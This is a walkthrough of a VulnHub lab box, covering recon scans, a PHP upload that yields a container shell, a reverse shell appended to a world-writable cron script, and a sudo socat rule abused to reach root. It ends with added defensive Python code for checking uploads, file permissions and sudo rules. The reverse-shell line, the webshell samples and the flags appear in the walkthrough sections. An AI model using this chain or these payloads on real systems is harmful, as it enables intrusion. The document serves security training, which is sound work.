## VulnHub walkthrough: 192.168.211.135

Contents: information gathering (arp, nmap, nikto, whatweb); web information gathering (dirmap); file upload; privilege escalation (system information gathering, lateral movement to richard, information disclosure, get root).

## Information gathering

### arp

Locate the target on the local VMware segment:

```
┌──(root㉿ru)-[~/kali/vulnhub]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:50:56:2f:dd:99, IPv4: 192.168.211.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.211.1   00:50:56:c0:00:08   VMware, Inc.
192.168.211.2   00:50:56:e6:61:4b   VMware, Inc.
192.168.211.135 00:50:56:21:cf:ed   VMware, Inc.
192.168.211.254 00:50:56:f0:b5:b8   VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.495 seconds (102.61 hosts/sec). 4 responded
```

The target is 192.168.211.135; the attacking box is 192.168.211.128 (eth0).

### nmap

Full TCP port scan:

```
┌──(root㉿ru)-[~/kali/vulnhub]
└─# nmap -p- 192.168.211.135 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 13:59 CST
Nmap scan report for 192.168.211.135
Host is up (0.0036s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:50:56:21:CF:ED (VMware)

Nmap done: 1 IP address (1 host up) scanned in 8.05 seconds
```

Only port 80 is open. Service, default-script and OS detection against it:

```
┌──(root㉿ru)-[~/kali/vulnhub]
└─# nmap -sC -sV -O -p 80 192.168.211.135 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 14:00 CST
Nmap scan report for 192.168.211.135
Host is up (0.00049s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Freelancer - Start Bootstrap Theme
MAC Address: 00:50:56:21:CF:ED (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.22 seconds
```

Apache 2.4.38 on Debian, serving the stock "Freelancer" Start Bootstrap theme. As nmap warns, the OS guess is weak with a single open port; the kernel string seen later (4.19.0-10-amd64) does fall inside its 4.15 - 5.8 range.

### nikto

```
┌──(root㉿ru)-[~/kali/vulnhub]
└─# nikto -h http://192.168.211.135/
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.211.135
+ Target Hostname:    192.168.211.135
+ Target Port:        80
+ Start Time:         2024-04-08 15:47:27 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 6a7f, size: 5af24a0184072, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2024-04-08 15:47:53 (GMT8) (26 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```

Nothing directly exploitable here: missing hardening headers, an ETag that leaks the inode, and the default /icons/README. The "outdated" line is relative to Nikto's version database and is not by itself evidence of an exploitable bug.

### whatweb

```
┌──(root㉿ru)-[~/kali/vulnhub]
└─# whatweb -v http://192.168.211.135/
WhatWeb report for http://192.168.211.135/
Status    : 200 OK
Title     : Freelancer - Start Bootstrap Theme
IP        : 192.168.211.135
Country   : RESERVED, ZZ

Summary   : Apache[2.4.38], Bootstrap, HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], JQuery, Script, X-UA-Compatible[IE=edge]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards.
        Version      : 2.4.38 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ Bootstrap ]
        Bootstrap is an open source toolkit for developing with HTML, CSS, and JS.
        Website     : https://getbootstrap.com/

[ HTML5 ]
        HTML version 5, detected by the doctype declaration

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to identify the operating system from the server header.
        OS           : Debian Linux
        String       : Apache/2.4.38 (Debian) (from server string)

[ JQuery ]
        A fast, concise, JavaScript that simplifies how to traverse HTML documents, handle events, perform animations, and add AJAX.
        Website     : http://jquery.com/

[ Script ]
        This plugin detects instances of script HTML elements and returns the script language/type.

[ X-UA-Compatible ]
        This plugin retrieves the X-UA-Compatible value from the HTTP header and meta http-equiv tag.
        More Info: http://msdn.microsoft.com/en-us/library/cc817574.aspx
        String       : IE=edge

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Mon, 08 Apr 2024 07:33:10 GMT
        Server: Apache/2.4.38 (Debian)
        Last-Modified: Sat, 12 Sep 2020 21:38:43 GMT
        ETag: "6a7f-5af24a0184072-gzip"
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 3377
        Connection: close
        Content-Type: text/html
```

## Web information gathering

### dirmap

```
┌──(root㉿ru)-[~/tools/dirscan/dirmap]
└─# python3 dirmap.py -i http://192.168.211.135/ -lcf
(dirmap v1.0 banner)
[*] Initialize targets...
[+] Load targets from: http://192.168.211.135/
[+] Set the number of thread: 30
[+] Coroutine mode
[+] Current target: http://192.168.211.135/
[*] Launching auto check 404
[+] Checking with: http://192.168.211.135/ccjimqtouvulxwpfqmepgsutmqaakqkggbqjpmlnko
[*] Use recursive scan: No
[*] Use dict mode
[+] Load dict:/root/tools/dirscan/dirmap/data/dict_mode_dict.txt
[*] Use crawl mode
[200][text/html][3.30kb] http://192.168.211.135/index.html
[200][text/markdown][278.00b] http://192.168.211.135/readme.md
[200][text/html][588.00b] http://192.168.211.135/upload/
[200][text/html; charset=UTF-8][500.00b] http://192.168.211.135/upload/upload.php
[200][text/html][3.30kb] http://192.168.211.135/
[200][application/javascript][906.00b] http://192.168.211.135/js/contact_me.js
[200][image/png][18.79kb] http://192.168.211.135/img/portfolio/safe.png
[200][image/png][10.04kb] http://192.168.211.135/img/profile.png
[200][text/css][4.92kb] http://192.168.211.135/font-awesome/css/font-awesome.min.css
[200][application/javascript][32.45kb] http://192.168.211.135/js/jquery.js
[200][image/png][23.76kb] http://192.168.211.135/img/portfolio/submarine.png
[200][application/javascript][680.00b] http://192.168.211.135/js/classie.js
[200][image/png][27.33kb] http://192.168.211.135/img/portfolio/circus.png
[200][text/css][1.82kb] http://192.168.211.135/css/freelancer.css
[200][image/png][16.67kb] http://192.168.211.135/img/portfolio/cake.png
[200][image/png][25.29kb] http://192.168.211.135/img/portfolio/game.png
[200][application/javascript][622.00b] http://192.168.211.135/js/freelancer.js
[200][text/css][18.91kb] http://192.168.211.135/css/bootstrap.min.css
[200][image/png][35.66kb] http://192.168.211.135/img/portfolio/cabin.png
[200][application/javascript][9.19kb] http://192.168.211.135/js/bootstrap.min.js
99% (6600 of 6618) |################################################### | Elapsed Time: 0:00:13 ETA: 0:00:00
```

Everything except /upload/ and /upload/upload.php is the static theme (the theme's own readme.md is served too). So the way in is the file upload.

## File upload

upload.php accepts a PHP file (the shell.php we see later under upload/files/), but its response does not say where the file is stored, so fuzz /upload/ for subdirectories:

```
┌──(root㉿ru)-[~/kali/vulnhub]
└─# wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt -u http://192.168.211.135/upload/FUZZ -t 100 --hc 404,403
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.211.135/upload/FUZZ
Total requests: 17770

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000055:   301        9 L      28 W       325 Ch      "files"
000003809:   200        31 L     85 W       903 Ch      "http://192.168.211.135/upload/"
```

The fuzz turns up /upload/files/, which is where uploads land. Start a listener; when the uploaded PHP is requested the shell comes back:

```
┌──(root㉿ru)-[~/kali/vulnhub]
└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.211.135: inverse host lookup failed: Unknown host
connect to [192.168.211.128] from (UNKNOWN) [192.168.211.135] 60876
Linux 32064e9210cb 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
 08:09:12 up 22 min,  0 users,  load average: 0.01, 0.87, 0.85
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

The uname/w/id banner is what the common php-reverse-shell pattern (`uname -a; w; id; /bin/sh -i`) prints on connect. Note the hostname: 32064e9210cb is a 12-hex-digit container ID, so this www-data shell is inside a Docker container, which the Maintenance-Web-Docker directory found next confirms.

## Privilege escalation

### System information gathering

SUID binaries are the stock Debian set, nothing useful:

```
$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/bin/mount
/bin/umount
/bin/su
$ ls -al /var/www/html
total 88
drwxr-xr-x 11 root root  4096 Sep 12  2020 .
drwxr-xr-x  1 root root  4096 Sep 10  2020 ..
drwxrwxrwx  2 root 1000  4096 Apr  8  2024 Maintenance-Web-Docker
drwxr-xr-x  2 root root  4096 Sep 12  2020 css
drwxr-xr-x  6 root root  4096 Sep 12  2020 font-awesome
drwxr-xr-x  2 root root  4096 Sep 12  2020 fonts
drwxr-xr-x  3 root root  4096 Sep 12  2020 img
-rw-r--r--  1 root root 27263 Sep 12  2020 index.html
drwxr-xr-x  2 root root  4096 Sep 12  2020 js
drwxr-xr-x  2 root root  4096 Sep 12  2020 less
-rw-r--r--  1 root root 11336 Sep 12  2020 license
drwxr-xr-x  2 root root  4096 Sep 12  2020 mail
-rw-r--r--  1 root root   278 Sep 12  2020 readme.md
drwxr-xr-x  3 root root  4096 Sep 12  2020 upload
```

Maintenance-Web-Docker is mode 777, group-owned by gid 1000, and that gid has no name inside the container: a first hint that the directory is shared with the host. Inside it:

```
$ ls -al
total 24
drwxrwxrwx  2 root 1000 4096 Apr  8  2024 .
drwxr-xr-x 11 root root 4096 Sep 12  2020 ..
-rwxrwxrwx  1 root root  164 Sep 13  2020 list.sh
-rwxr-xr-x  1 root root  204 Sep 12  2020 maintenance.sh
-rw-r--r--  1 1000 1000 5066 Apr  8 08:42 out.txt
$ cat list.sh
#!/bin/bash
date >> /home/richard/web/Maintenance-Web-Docker/out.txt
ls /home/richard/web/upload/files/ | wc -l >> /home/richard/web/Maintenance-Web-Docker/out.txt
$ date
Mon Apr  8 08:43:20 UTC 2024
```

list.sh appends the current date to /home/richard/web/Maintenance-Web-Docker/out.txt, then counts the files in /home/richard/web/upload/files/ and appends that count to the same file. Three details make it the pivot:

- The script refers to /home/richard/web/..., while the same files appear under /var/www/html inside the container. The host bind-mounts richard's web tree into the container, so anything written here from the container is visible on the host.
- out.txt is owned by uid 1000 and was modified at 08:42, a minute before our `date`. Something on the host is running list.sh periodically as uid 1000 (almost certainly a cron job of richard; the crontab itself is not shown on the page).
- list.sh is mode 777. Whatever www-data appends from inside the container executes as richard on the host the next time the job fires. maintenance.sh is 755, but since the directory is world-writable and not sticky it could equally be renamed and replaced.

### Lateral movement to richard

Append a reverse shell to list.sh (the `>>`, `>&` and quotes were stripped by the page's extraction; this is the reconstructed command) and listen on 7878:

```
$ echo "/bin/bash -c 'bash -i >& /dev/tcp/192.168.211.128/7878 0>&1'" >> list.sh
```

On the next run the shell arrives on the host (hostname EC2) as richard:

```
richard@EC2:~$ ls
HackTools  user.txt  web
richard@EC2:~$ cat user.txt
3a6b99f59ea363803bcafc7f5dd9b1e8
richard@EC2:~/HackTools$ sudo -l
Matching Defaults entries for richard on EC2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User richard may run the following commands on EC2:
    (ALL) NOPASSWD: /home/richard/HackTools/socat TCP-LISTEN\:8080\,fork TCP\:127.0.0.1\:90
richard@EC2:~/HackTools$ sudo /home/richard/HackTools/socat TCP-LISTEN\:8080\,fork TCP\:127.0.0.1\:90
```

Run with sudo, the socat rule does exactly what it says: 8080 on every interface is now forwarded, as root, to 127.0.0.1:90, and a fresh port scan of the box shows 8080 open. Two things about the rule are worth noting. First, whatever listens on 127.0.0.1:90 was loopback-only until now; the rule exposes it to the network under root's identity. Second, the permitted binary sits under /home/richard. The page does not show the permissions on HackTools, but if richard can write that directory the rule is equivalent to unrestricted root, because the file at that path can be swapped before sudo executes it.

### Information disclosure

Testing the forwarded service shows it leaks information and, more importantly, runs as root: it serves richard's web tree, the same tree the upload landed in. Requesting the payload uploaded earlier, now at /home/richard/web/upload/files/shell.php, through port 8080 therefore executes it as root on the host rather than as www-data in the container.

### get root

Listener for the second shell (the page uses port 2345 this time):

```
┌──(root㉿ru)-[~/tools/dirscan/dirmap]
└─# nc -lvvp 2345
listening on [any] 2345 ...
192.168.211.135: inverse host lookup failed: Unknown host
connect to [192.168.211.128] from (UNKNOWN) [192.168.211.135] 42992
Linux EC2 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
 05:06:55 up 32 min,  0 users,  load average: 6.43, 6.14, 4.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
proof.txt
# cat proof.txt
(ASCII art banner: "Well done.")
07f61ca07bc617f9639b412423b2cc6f
Twitter: 0x04E1
#
```

The hostname is EC2, not the container ID, so this is root on the host. The whole chain is: unrestricted PHP upload, www-data inside a container, a world-writable script on a bind mount executed by a host cron job as richard, and a sudo rule that lets richard expose a root-run loopback web service that executes the same uploaded file.
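The upload handler on this box accepted shell.php as-is, which is what the File upload section exploits. The following is an added example, not code from the page or from the VulnHub box: an upload validator in Python showing the checks upload.php lacked. Function and constant names (`validate_upload`, `ALLOWED_TYPES`, `PHP_MARKERS`) are this example's own, and the two-megabyte limit is an assumed policy.

```python
import secrets
from pathlib import PurePosixPath

# Allow-list: extension -> magic bytes the content must begin with.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 2 * 1024 * 1024  # assumed policy limit

# Byte patterns a PHP handler would execute if the file ever landed somewhere
# PHP is enabled; polyglot "images" carrying these are refused outright.
PHP_MARKERS = (b"<?php", b"<?=", b"<script language=\"php\"")


def validate_upload(filename: str, data: bytes):
    """Return (True, storage_name) for an acceptable image, else (False, reason).

    The storage name is generated server-side; the client-supplied name is
    consulted only for the claimed extension, never reused.
    """
    # 1. Keep only the last path component so "../../x.png" cannot leave the
    #    upload directory, then normalise case.
    name = PurePosixPath(filename.replace("\\", "/")).name.lower()
    if not name or name.startswith("."):
        return False, "empty or dot-file name (.htaccess and friends)"
    if not data or len(data) > MAX_BYTES:
        return False, "size out of range"

    # 2. Every dotted suffix must be on the allow-list, so "shell.php.png"
    #    fails here exactly like "shell.php" does.
    parts = name.split(".")
    if len(parts) < 2:
        return False, "no extension"
    suffixes = parts[1:]
    if any(s not in ALLOWED_TYPES for s in suffixes):
        return False, "extension not allowed"
    ext = suffixes[-1]

    # 3. The bytes must match the claimed type, not just the name.
    if not data.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match extension"

    # 4. Refuse images that also carry PHP open tags.
    lowered = data.lower()
    if any(marker in lowered for marker in PHP_MARKERS):
        return False, "server-side code embedded in file"

    # 5. Random name, server-chosen extension. Store the result outside the
    #    document root (or in a directory with the PHP handler disabled).
    return True, f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + bytes(32)  # constructed sample input
    for fname, body in [("shell.php", b"<?php system($_GET['c']); ?>"),
                        ("shell.php.png", b"<?php system($_GET['c']); ?>"),
                        ("../../photo.PNG", png),
                        ("x.png", png + b"<?php echo 1; ?>")]:
        print(fname, "->", validate_upload(fname, body))
```

The order matters: name checks are cheap and reject most attempts before any content is inspected, while the magic-byte and marker checks catch the renamed-webshell and polyglot cases that an extension filter alone lets through.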
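The System information gathering section spots the pivot by eye: a 777 script in a 777 directory whose output file is owned by a different uid. The following is an added example, not from the page: a Python audit that parses an `ls -al` listing, flags executable files a local user could modify or replace, and infers who runs them from the owner of the output file. The sample listing is the one from the page; the function names (`parse_ls`, `audit`, `infer_runner`) are this example's own.

```python
import re
from dataclasses import dataclass

# One `ls -al` row: mode, link count, owner, group, size, three date fields, name.
LS_ROW = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+"
    r"\d+\s+\S+\s+\d+\s+\S+\s+(?P<name>.+)$"
)

# Listing copied from the walkthrough (Maintenance-Web-Docker inside the container).
SAMPLE_LISTING = """\
total 24
drwxrwxrwx  2 root 1000 4096 Apr  8  2024 .
drwxr-xr-x 11 root root 4096 Sep 12  2020 ..
-rwxrwxrwx  1 root root  164 Sep 13  2020 list.sh
-rwxr-xr-x  1 root root  204 Sep 12  2020 maintenance.sh
-rw-r--r--  1 1000 1000 5066 Apr  8 08:42 out.txt
"""


@dataclass
class Entry:
    mode: str
    owner: str
    group: str
    name: str

    # mode[0] is the type; [1:4] user bits, [4:7] group bits, [7:10] other bits.
    @property
    def is_dir(self):
        return self.mode[0] == "d"

    @property
    def is_file(self):
        return self.mode[0] == "-"

    @property
    def world_writable(self):
        return self.mode[8] == "w"

    @property
    def sticky(self):
        return self.mode[9] in "tT"  # restricted deletion on a directory

    @property
    def executable(self):
        return any(c in "xst" for c in (self.mode[3], self.mode[6], self.mode[9]))


def parse_ls(text):
    entries = []
    for line in text.splitlines():
        m = LS_ROW.match(line.strip())
        if m:
            entries.append(Entry(m["mode"], m["owner"], m["group"], m["name"]))
    return entries


def infer_runner(entries, output_name):
    """A job writes its output as the account it runs under, so the output
    file's owner tells us who executes the script (uid 1000 here, not root)."""
    for e in entries:
        if e.name == output_name:
            return e.owner
    return None


def audit(listing, output_name=None):
    """Return executable files a local user could make the job execute, with
    the reason(s) and the account they would run as."""
    entries = parse_ls(listing)
    here = next((e for e in entries if e.name == "."), None)
    # Without the sticky bit, write+exec on the directory lets anyone rename
    # a root-owned 755 file away and drop a replacement under the same name.
    dir_replaceable = bool(here and here.is_dir and here.world_writable and not here.sticky)
    runner = infer_runner(entries, output_name) if output_name else None
    findings = []
    for e in entries:
        if not (e.is_file and e.executable):
            continue
        reasons = []
        if e.world_writable:
            reasons.append("file mode lets anyone append to or rewrite it")
        if dir_replaceable:
            reasons.append("directory is world-writable and not sticky, so the file can be renamed and replaced")
        if reasons:
            findings.append({"name": e.name, "owner": e.owner, "runs_as": runner, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_LISTING, "out.txt"):
        print(f["name"], "owner", f["owner"], "runs as", f["runs_as"])
        for r in f["reasons"]:
            print("   -", r)
```

Run against the page's listing it reports list.sh twice over (writable file, replaceable in a writable directory) and maintenance.sh once, both executing as uid 1000; the same check on the host side would name richard.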
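The sudo rule in the Lateral movement section is dangerous for two independent reasons (a relay that exposes a loopback-only root service, and a binary path under the user's home). As an added example, not from the page, here is a small `sudo -l` triage in Python that parses the rule block, undoes the sudoers escaping of `:` and `,`, and reports both issues. The sample text is the `sudo -l` output from the page; the names `parse_sudo_l`, `assess`, `audit_sudo`, `SYSTEM_DIRS` and `RELAYS` are this example's own.

```python
import re
import shlex

# Directories root controls on a stock Debian; a command anywhere else
# deserves a check of who can write its directory.
SYSTEM_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
               "/usr/local/bin/", "/usr/local/sbin/", "/usr/lib/")
# Tools whose job is to move traffic between sockets.
RELAYS = {"socat", "nc", "ncat", "netcat", "ssh", "chisel"}

# One rule as `sudo -l` prints it:  (runas) TAG: command args
RULE = re.compile(r"^\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")

# Copied from the walkthrough; raw string keeps the sudoers backslashes.
SUDO_L_OUTPUT = r"""Matching Defaults entries for richard on EC2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User richard may run the following commands on EC2:
    (ALL) NOPASSWD: /home/richard/HackTools/socat TCP-LISTEN\:8080\,fork TCP\:127.0.0.1\:90
"""


def parse_sudo_l(text):
    """Return the rules listed under 'may run the following commands'."""
    rules, in_rules = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = RULE.match(line)
        if not m:
            continue
        # sudoers escapes ':' and ',' inside arguments; undo before splitting.
        cmd = m["cmd"].replace("\\:", ":").replace("\\,", ",")
        rules.append({
            "runas": m["runas"].strip(),
            "nopasswd": "NOPASSWD" in m["tags"],
            "argv": shlex.split(cmd),
        })
    return rules


def assess(rule):
    """List the reasons one rule is worth chasing (empty list: nothing obvious)."""
    argv = rule["argv"]
    if not argv:
        return []
    exe, args = argv[0], argv[1:]
    if exe == "ALL":
        return ["unrestricted command list: full root"]
    base = exe.rsplit("/", 1)[-1]
    findings = []
    if not exe.startswith(SYSTEM_DIRS):
        findings.append(f"{exe} lives outside the root-owned system directories; "
                        "check whether the invoking user can write its directory")
    if base in RELAYS:
        loop = [a for a in args if "127.0.0.1" in a or "localhost" in a]
        if loop:
            findings.append(f"{base} relays to loopback-only {', '.join(loop)} as {rule['runas']}: "
                            "a service bound to localhost becomes reachable from the network")
        else:
            findings.append(f"{base} is a network relay executed as {rule['runas']}")
    if findings and rule["nopasswd"]:
        findings.append("NOPASSWD: a shell as this user is enough, no password required")
    return findings


def audit_sudo(text):
    return [(r["argv"][0] if r["argv"] else "", assess(r)) for r in parse_sudo_l(text)]


if __name__ == "__main__":
    for exe, reasons in audit_sudo(SUDO_L_OUTPUT):
        print(exe)
        for r in reasons:
            print("   -", r)
```

The loopback check is the one that matters on this box: the relay target 127.0.0.1:90 is what turns a root-only service into the final step of the chain. The system-directory check is the follow-up question the page leaves open, since HackTools is in richard's home and its permissions are not shown.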